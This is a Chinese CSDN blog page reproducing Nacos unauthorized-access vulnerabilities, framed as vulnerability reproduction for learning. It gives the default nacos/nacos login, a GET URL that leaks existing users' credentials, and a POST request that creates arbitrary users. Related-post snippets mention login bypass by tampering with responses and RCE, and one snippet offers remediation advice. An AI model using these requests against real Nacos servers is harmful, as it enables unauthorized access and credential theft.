Nacos未授权访问漏洞复现,2024年最新网络安全高级工程师面试题

最新推荐文章于 2024-07-16 01:11:37 发布
最新推荐文章于 2024-07-16 01:11:37 发布
阅读量594 收藏 3
点赞数 3
分类专栏: 2024年程序员学习 文章标签: web安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83946722/article/details/137707009
版权
本文详细介绍了Nacos的未授权访问漏洞,包括弱口令登录、账号密码泄露、任意用户创建以及如何利用回包进行管理员权限篡改。作者分享了其在网络安全领域的经验,提供了一份2024年的网络安全学习资料,覆盖了从基础到高级的全面知识,并给出了网络渗透的学习路径,鼓励大家加入技术交流圈子共同进步。
摘要由CSDN通过智能技术生成

1 弱口令:nacos/nacos

http://ip:8848/nacos

以上网址是默认登录页面地址,如图

尝试用弱口令nacos/nacos登录。

2 账号及密码泄露

http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=9

访问以上地址可以获取到已有的用户名和密码,如图

3 创建任意用户

POST http://ip:8848/nacos/v1/auth/users?username=test1&password=test1

抓包将GET改成POST提交,即可创建任意用户

使用创建的test1/test1 用户成功登录

最低0.47元/天 解锁文章
2401_83946722
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试漏洞复现nacos授权访问漏洞复现并getshell
HACKONE的博客
03-30 763
nacos授权访问
Nacos授权访问漏洞
00勇士王子的博客
02-27 6334
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
上心师傅的思路分享(三)--Nacos渗透
记录开发和安全学习过程中的点点滴滴
06-10 1544
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
Nacos 授权访问漏洞
热门推荐
ljy啊虎的博客
09-07 2万+
Nacos 授权访问漏洞 /nacos/v1/auth/users?pageNo=1&pageSize=9
SexyBeast233#SecBooks#Alibaba Nacos 控制台默认弱口令1
07-25
Alibaba Nacos 控制台默认弱口令漏洞描述Alibaba Nacos 控制台存在默认弱口令 nacos/nacos,可登录后台查看敏感信息漏洞影响漏洞
Nacos 身份认证绕过漏洞(已修复)
weixin_58642210的博客
11-14 1213
Nacos 身份认证绕过漏洞
Nacos 授权访问漏洞复现
weixin_58609150的博客
07-08 625
POST http://IP:端口/nacos/v1/auth/users?漏洞地址:GET http://IP:端口/nacos/v1/auth/users?输入任意密码bp抓包修改返回包即可绕过进入后台。抓包将get方式修改为post并重放。
20231月最新dubbo面试题
01-23
本篇文章将深入解析20231月的最新 Dubbo 面试题,帮助你掌握 Dubbo 的核心概念和技术要点。 首先,我们需要理解 Dubbo 的工作原理。Dubbo 作为一个服务框架,主要负责服务的发布、消费、动态代理和负载均衡。服务...
SpringBoot最新2021面试题高级面试题及附答案解析.md
07-27
### SpringBoot最新2023面试题高级面试题及附答案解析 #### 1、SpringBoot核心的两个配置文件: SpringBoot的核心配置文件主要包括`bootstrap`与`application`两类,这两类文件分别承担着不同的职责。 - **...
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组...
java 架构、中高级10+份面试题和答案
11-02
java 架构、中高级10+份面试题和答案;精选;不断迭代增加;文档定期维护更新;附件为百度云盘下载链接.
Nacos最新0day漏洞复现
最新发布
qq_55213436的博客
07-16 3150
漏洞的核心在于 Nacos 的某些接口没有严格的权限控制,攻击者可以通过特制的请求向 Nacos 服务器发送恶意数据,从而执行任意代码。下载nacos代码搭建环境这次漏洞 需要登录到后才才能利用漏洞涉及到 Nacos 在处理反序列化数据时的缺陷,攻击者能够通过特定的 JSON 数据结构,远程执行恶意代码。以利用该漏洞读取敏感文件、执行系统命令。
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 5515
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
Nacos身份认证漏洞
C_0010的博客
12-09 4552
Nacos身份认证漏洞,我们竟然2022才发现!
漏洞复现--SysAid On-premise远程代码执行(CVE-2023-47246)
qq_53003652的博客
12-18 994
SysAid On-premise 提供了诸如故障报告、资产管理、服务台支持、自动化流程等功能,以帮助 IT 团队更高效地工作。这种部署模式可以满足那些对数据安全性有更高要求的组织,同时也提供了更多的自定义和控制能力,以适应特定的业务需求和流程。该产品存在远程代码执行。
wmic的历史传奇(对Windows的管理),GitHub标星50k的网络安全全栈技术知识
m0_60607971的博客
04-08 575
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CVE-2023–22809漏洞利用|复现
Musda的博客
06-22 679
首先需要检查sudoedit版本此漏洞的利用范围仅限于。
WordPress LayerSlider插件SQL注入漏洞复现(CVE-2024-2879)
qq_39894062的博客
04-12 754
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
nacos授权访问漏洞 修复
07-15
对于Nacos授权访问漏洞,建议你采取以下措施进行修复: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修复和漏洞修复。 2. 配置访问控制:通过配置适当的访问控制策略,限制只有授权的用户或者IP可以访问Nacos。可以使用Nacos的权限管理功能来实现。 3. 强化认证和授权:启用强密码策略,使用复杂的密码,并定期更换密码。确保只有授权用户具有适当的权限来访问和管理Nacos。 4. 防火墙设置:配置防火墙来限制对Nacos访问,只允许来自可信源IP地址的请求。 5. 安全审计日志:启用安全审计日志功能,记录所有关键操作和访问日志。这有助于发现异常行为和及时应对潜在的安全威胁。 6. 定期备份:定期备份Nacos的数据,以防止数据丢失或损坏。备份可以帮助你在遭受攻击或数据丢失时快速恢复。 7. 安全漏洞扫描和测试:与安全团队合作,进行定期的安全漏洞扫描和安全测试,以发现并修复潜在的安全问题。 8. 及时响应:如果你发现任何安全问题或漏洞,应立即采取措施进行修复和调查。可以向Nacos官方团队报告漏洞,并升级到已修复漏洞的版本。 请记住,安全是一个持续的过程,需要不断地关注和改进。通过以上措施,你可以提高Nacos安全性,并减少授权访问漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值